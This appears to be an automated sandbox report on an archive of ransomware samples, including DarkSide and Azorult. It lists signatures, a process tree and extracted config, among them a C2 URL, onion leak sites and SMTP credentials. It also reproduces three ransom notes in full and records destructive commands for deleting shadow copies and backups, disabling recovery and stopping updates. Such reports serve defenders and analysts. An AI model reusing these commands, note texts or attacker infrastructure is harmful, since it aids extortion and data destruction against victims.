Overview

overview

10

Static

static

1

RNSM00416.7z

windows10-2004-x64

10

Analysis

  • max time kernel
    165s
  • max time network
    512s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 16:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00416.7z

  • Size

    63.5MB

  • MD5

    9ad7acd12fdb6f4987085f017b1ed245

  • SHA1

    3886b70681b87a8121485ae50885bc14b0f4651c

  • SHA256

    9d2dc1dd809d37660de03488b05b4705e23b8cb04b9fd1cc1eb8c50943d8b9fb

  • SHA512

    8364d22160cc3374fb912d59ce5cea2056b2f530e5693f636d3f30211b544e135f3b7eb5d59d76b955b390009d3203c4b771bbc0c295917c32e4402fed3a18eb

  • SSDEEP

    1572864:NO+mdGZyLbosBDD8TFs9eC1O5qMQCBp2ZB22mi:s7boW85IP10qNyrRi

Score
10/10
azorultdarksidemodiloadercredential_accesscryptonedefense_evasiondiscoveryevasionexecutionimpactinfostealerpackerpersistenceprivilege_escalationransomwarespywarestealertrojanupxvmprotect

Malware Config

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    smtp.gmail.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    21011997

Extracted

Family

azorult

C2

http://javiermar2.temp.swtest.ru/index.php

Extracted

Path

C:\Users\Admin\README.f875121f.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Extracted

Path

C:\Program Files\Instructions for recovery FILES.TXT

Ransom Note
Your files are now encrypted! Your personal identifier: pAQAAAAAAAAeOqEnHZP=90UkCAN=EazcjvGMwvFb8lg=lE7UqInhZdybS9otvfXb3Xit3RabpFTtrVW8PMKrnMOfr2Nqe6akOR9w Koxjfcd+2mUNrqShgKLoi1V9ZrAy5fY7Gx2en02=yaNdgTPmt69noT0x4mSuXc3l9AdlhY=WpPTILLT+eL2e71NFMtSx6apG+1M8 B2f8KOlugx+w8bhlaUoVxklf=qdNCQAvIWPI6nm3Pgaf=flaZz11nYMFQtQPvGdTq0kHLlC9L3POIb6hiwLGiBRi=4LXw4k=Xn5p 21oe26GlT7wEajGX2oKqYad=Wdl4mdaWPQcR2oC6B+qEZLDAF8uW8=W4ofnZowRw4JW5U8CmkuaFBpm3nD30zso35xHiXG3BVJqx efnFfdnO1HuChj9m8LHcyYD+RTBxEC4u0=IRSDRkhIDZYl5BUryDjtKE4PYoraOGSdFE86Dbh+qusl8D57naHwFFyDAI7SCwBDWd 1y4EKcWJZ+V36ARMI5TAJH3JdiEc0P5PM4ZzoLNwZFv5xWN7Sc0glEpPkJUN4+1GTQTdIQgswWf4Ed=6=ZEOGc42x6Ickbi4GK1K 8EuubBU5QnXfoekFdzDN6V0TTD+EEjAgqfJq7g3OsSSgo0nHHjAS+BQsOIOX8ILvk7eizXUbRikZMOK9yYVs4qqIIbPOGfFZDZ3B sWVBKO5Z1Iu4nKzswAF1nTi4WXC0BjOD8aSLjWbYQbYTBlGHxB3EOxcsmJggDB6YG72GpjDLFBhISWJNT4LD6pHYja0JTY8=IIuL xHkY6BEUKSfq9CQDu84K6F61hxr0vmBxlG+snDuvBj3+Pk All your files have been encrypted due to a security problem with your PC. Now you should send us email with your personal identifier. This email will be as confirmation you are ready to pay for decryption key. You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. Contact us using this email address: [email protected] (priority) [email protected] (alternative) An answer can be mark as spam Free decryption as guarantee! Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.). How to obtain Bitcoins? * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price: https://localbitcoins.com/buy_bitcoins * Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Path

C:\Users\Admin\3D Objects\HOW-TO-DECRYPT-kgkq9.txt

Ransom Note
[+] What happened? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has extension *.kgkq9 By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant get back your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] Using a TOR browser! - Download and install TOR browser from this site: hxxps://torproject.org/ - Open our website: hxxp://m6s6axasulxjkhzh.onion - Follow the on-screen instructions Extension name: *.kgkq9 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) will make everything possible for restoring, but please do not interfere. !!! !!! !!! ��

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Azorult family
    azorult
  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Darkside family
    darkside
  • Disables service(s) 3 TTPs
    evasionexecution
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Modifies firewall policy service 3 TTPs 4 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Modiloader family
    modiloader
  • CryptOne packer 1 IoCs

    Detects CryptOne packer defined in NCC blogpost.

    cryptonepacker
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • ModiLoader Second Stage 1 IoCs
  • Renames multiple (213) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (3650) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Sets service image path in registry 2 TTPs 2 IoCs
    persistence
  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 34 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Impair Defenses: Safe Mode Boot 1 TTPs 7 IoCs
    defense_evasion
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Adds Run key to start application 2 TTPs 10 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops desktop.ini file(s) 27 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
    defense_evasionprivilege_escalation
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Accessibility Features 1 TTPs

    Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.

    persistenceprivilege_escalation
  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 10 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
    stealer
  • Modifies registry class 64 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00416.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4808
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1840
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4696
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3460
      • C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe
        HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4688
      • C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Blocker.gen-0aeebcfcadc1e2f2f95b3bbc8d1edf5dad6f10fcfdae0cadc8672c238621112e.exe
        HEUR-Trojan-Ransom.Win32.Blocker.gen-0aeebcfcadc1e2f2f95b3bbc8d1edf5dad6f10fcfdae0cadc8672c238621112e.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1872
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1872 -s 1464
          4⤵
          • Program crash
          PID:7376
      • C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe
        HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3352
        • C:\Users\Admin\Desktop\00416\tpvpyme.exe
          "C:\Users\Admin\Desktop\00416\tpvpyme.exe"
          4⤵
          • Modifies firewall policy service
          • Modifies visiblity of hidden/system files in Explorer
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\Windows\splwow64.exe
            C:\Windows\splwow64.exe 12288
            5⤵
              PID:7156
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00416\USB_Habilitar.bat" "
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1324
              • C:\Windows\SysWOW64\regedit.exe
                REGEDIT /S "C:\Users\Admin\Desktop\00416\USB_habilitar.reg
                6⤵
                • System Location Discovery: System Language Discovery
                • Runs .reg file with regedit
                PID:6284
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00416\windowsUpdate.bat" "
              5⤵
              • System Location Discovery: System Language Discovery
              PID:7556
              • C:\Windows\SysWOW64\regedit.exe
                REGEDIT /S "C:\Users\Admin\Desktop\00416\windowsUpdate.reg
                6⤵
                • System Location Discovery: System Language Discovery
                • Runs .reg file with regedit
                PID:7296
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
              5⤵
              • System Location Discovery: System Language Discovery
              PID:6488
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f
              5⤵
              • System Location Discovery: System Language Discovery
              PID:8732
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sc config wuauserv start= disabled
              5⤵
              • System Location Discovery: System Language Discovery
              PID:6784
              • C:\Windows\SysWOW64\sc.exe
                sc config wuauserv start= disabled
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:5304
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c net stop wuauserv
              5⤵
              • System Location Discovery: System Language Discovery
              PID:8508
              • C:\Windows\SysWOW64\net.exe
                net stop wuauserv
                6⤵
                • System Location Discovery: System Language Discovery
                PID:7104
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop wuauserv
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:5992
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
              5⤵
              • System Location Discovery: System Language Discovery
              PID:6992
              • C:\Windows\SysWOW64\reg.exe
                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4236
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2760
              • C:\Windows\SysWOW64\cmd.exe
                cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1940
                • C:\Windows\SysWOW64\reg.exe
                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:8660
        • C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exe
          HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2412
        • C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe
          HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops desktop.ini file(s)
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3084
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C wmic SHADOWCOPY DELETE ; wbadmin DELETE SYSTEMSTATEBACKUP ; bcdedit.exe /set default bootstatuspolicy ignoreallfailures ; bcdedit.exe /set default recoveryenabled No
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1480
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic SHADOWCOPY DELETE ; wbadmin DELETE SYSTEMSTATEBACKUP ; bcdedit.exe /set default bootstatuspolicy ignoreallfailures ; bcdedit.exe /set default recoveryenabled No
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:6280
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "powershell -command Start-Sleep -s 1 ; Remove-Item C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:8772
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command Start-Sleep -s 1 ; Remove-Item C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:404
        • C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exe
          HEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:3512
        • C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.PornoAsset.gen-7654394bbdcc63d7ce5b825a87370e66d098e195af7b40abab5188744f94ac6e.exe
          HEUR-Trojan-Ransom.Win32.PornoAsset.gen-7654394bbdcc63d7ce5b825a87370e66d098e195af7b40abab5188744f94ac6e.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:5156
        • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe
          Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1760
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EN.bat" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:7656
            • C:\Users\Admin\AppData\Local\Temp\Install.exe
              Install.exe -p123456 -dC:\Users\Admin\AppData\Local\Temp
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:6800
              • C:\Users\Admin\AppData\Local\Temp\add.exe
                "C:\Users\Admin\AppData\Local\Temp\add.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:9096
                • C:\Users\Admin\AppData\Roaming\iexplorer.exe
                  "C:\Users\Admin\AppData\Roaming\iexplorer.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1452
              • C:\Users\Admin\AppData\Local\Temp\SUPERAntiSpywarePro.exe
                "C:\Users\Admin\AppData\Local\Temp\SUPERAntiSpywarePro.exe"
                6⤵
                • Sets service image path in registry
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:7324
                • C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
                  "C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE" -install -name:!SASCORE -display:"SAS Core Service" -description:"SUPERAntiSpyware Core Service" -pipe:sascoreservicepipe
                  7⤵
                  • Executes dropped EXE
                  • Impair Defenses: Safe Mode Boot
                  PID:1704
                • C:\Windows\system32\REGSVR32.EXE
                  "C:\Windows\system32\REGSVR32.EXE" /s "C:\Program Files\SUPERAntiSpyware\SASCTXMN64.DLL"
                  7⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  PID:9020
                • C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
                  "C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Adds Run key to start application
                  • Drops file in Windows directory
                  • Checks SCSI registry key(s)
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:4636
                  • C:\Program Files\SUPERAntiSpyware\SSUPDATE64.EXE
                    "C:\Program Files\SUPERAntiSpyware\SSUPDATE64.EXE" C:\Users\Admin\AppData\Local\Temp\SSUC315.tmp
                    8⤵
                      PID:2796
                    • C:\Windows\System32\cacls.exe
                      "C:\Windows\System32\cacls.exe" "C:\System Volume Information" /E /G everyone:F
                      8⤵
                        PID:6764
                      • C:\Program Files\SUPERAntiSpyware\sas_enum_cookies.exe
                        sas_enum_cookies.exe
                        8⤵
                          PID:3016
                        • C:\Program Files\SUPERAntiSpyware\sas_enum_cookies.exe
                          sas_enum_cookies.exe
                          8⤵
                            PID:8328
                          • C:\Windows\System32\cacls.exe
                            "C:\Windows\System32\cacls.exe" "C:\System Volume Information" /E /R everyone
                            8⤵
                              PID:6644
                            • C:\Windows\System32\cacls.exe
                              "C:\Windows\System32\cacls.exe" "C:\System Volume Information" /E /G everyone:F
                              8⤵
                                PID:6160
                              • C:\Program Files\SUPERAntiSpyware\sas_enum_cookies.exe
                                sas_enum_cookies.exe
                                8⤵
                                  PID:4404
                                • C:\Program Files\SUPERAntiSpyware\sas_enum_cookies.exe
                                  sas_enum_cookies.exe
                                  8⤵
                                    PID:6836
                        • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Blocker.lckf-19205dc779799f71ecdff8dd7ec4a2a9106540d143a713e2c847e1f58266b0f3.exe
                          Trojan-Ransom.Win32.Blocker.lckf-19205dc779799f71ecdff8dd7ec4a2a9106540d143a713e2c847e1f58266b0f3.exe
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:6892
                        • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe
                          Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe
                          3⤵
                          • Executes dropped EXE
                          • Impair Defenses: Safe Mode Boot
                          • Adds Run key to start application
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          PID:3952
                        • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exe
                          Trojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exe
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          PID:5388
                        • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
                          Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
                          3⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Sets desktop wallpaper using registry
